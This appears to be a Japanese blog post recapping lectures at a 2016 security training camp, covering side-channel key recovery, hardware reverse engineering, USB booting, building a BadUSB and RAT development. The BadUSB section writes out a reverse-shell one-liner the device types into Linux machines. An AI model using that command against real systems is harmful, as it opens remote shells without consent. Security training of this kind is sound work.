公開鍵暗号のハードウェア実装と攻撃～ICカードが持つ脆弱性とその対策～

サイドチャネル攻撃を実践してみる講義。
サイドチャネル攻撃の学習用ボードを用いた演習で、RSAとAESの秘密鍵を解析した。
RSAは、計算する回路の違いから電圧に差が生じるので、オシロスコープを見ながら、鍵を推定した。
AESは、ノイズの影響が大きく、多量のサンプリングを取って解析した。サンプリングしたデータから、鍵を推定する過程は、元から用意されていたツールを使ったので、詳細は分からなかった。

サイドチャネル攻撃を知識としてしか知らなかったので、実践できたのがとても良かった。

謎マシンでNetBSDのクロス開発体験

VMでNetBSDを動作させ、その上でRaspberry Piで動作するカーネルをビルドした。
僕の環境では、カーネルを書き換えて動作させたところ、dhcpdあたりで処理が止まってしまった。
LANケーブルを繋がないと、正常に処理が進んでいくので、dhcpdに関するビルドが失敗もしくはバグだと思う。

Raspberry Piをbaremetalさせるときに、クロスコンパイルを整備したことがあるが、NetBSDだととても簡単にできた(そもそもデフォルトで揃っていた？)。

フィジカル・リバースエンジニアリング入門

よく分からない基盤を渡され、そこから解析をしていく講義。
まずは、基盤上にあるチップの型番を調べ、リファレンスシートが探し、リファレンスシートを読みながら、UARTやJTAGがないか探した。
実際に、UARTからログを抜き出し、どのような情報があるのか調査した。
ROMの開始アドレスやサイズなどを調べた。

オンラインゲームアタック＆ディフェンスチャレンジ

この講義が一番辛かった。
「Node.jsわからん！Web無理！」以上です。
精進します。

USBメモリからブートしてみよう

USBのMBRに命令書き込んで、OSを介さずにHello World!する講義。
講義資料として頂いた本の表紙が可愛い。

自作エミュレータで学ぶx86アーキテクチャ　コンピュータが動く仕組みを徹底理解！

• 作者: 内田公太,上川大介
• 出版社/メーカー: マイナビ出版
• 発売日: 2015/08/28
• メディア: Kindle版
• この商品を含むブログを見る

AVRマイコンで作るBadUSB自作

AVRマイコンを使って、BadUSBを作ってみる講義。AVRマイコンは、PS／2キーボードのキー入力をエミュレートし、PS/2-USB変換アダプターでPCに接続するといった感じ。

Windowsに対して、電源を落とすBasUSBを作った。
「Alt + F4」と「 Enter」を押すだけ。

Linux(もしくはそれに準ずる感じのOS)に対して、リバースシェルを貼るBadUSBも作った。
「sh -i >& /dev/tcp/10.0.0.1/8080 0>&1」を入力するだけ。

他の参加者の作ったBadUSBを見て回って、キーボードをエミュレートしてるだけでも、色々な事ができる事を知った。

遠隔操作マルウェアと標的型攻撃からの防衛

個人的に雲の上の存在だと思っていた凌さんの講義。他の講師に関しては、名前聞いた事あるなーぐらいしか思わなかったが、凌さんにお会いできた時は感動した。そもそも実在したんだとさえ思った。

ShinoBotでのマルウェア体験や、RAT(Remote Access Trojan / Remote Administration Tool)の開発をした。
無限CDトレー開き最高！

tweetは、マルウェア体験中にwebカメラで撮影されていたもの。

【2016'夏の思い出】
セキュリティ・キャンプの講義でShinoBOT経由で撮られたWebカメラの画像。#seccamp pic.twitter.com/HQUY0sUE1K

— Shøta Shinogۜi ♾ (@Sh1n0g1) 2016年8月18日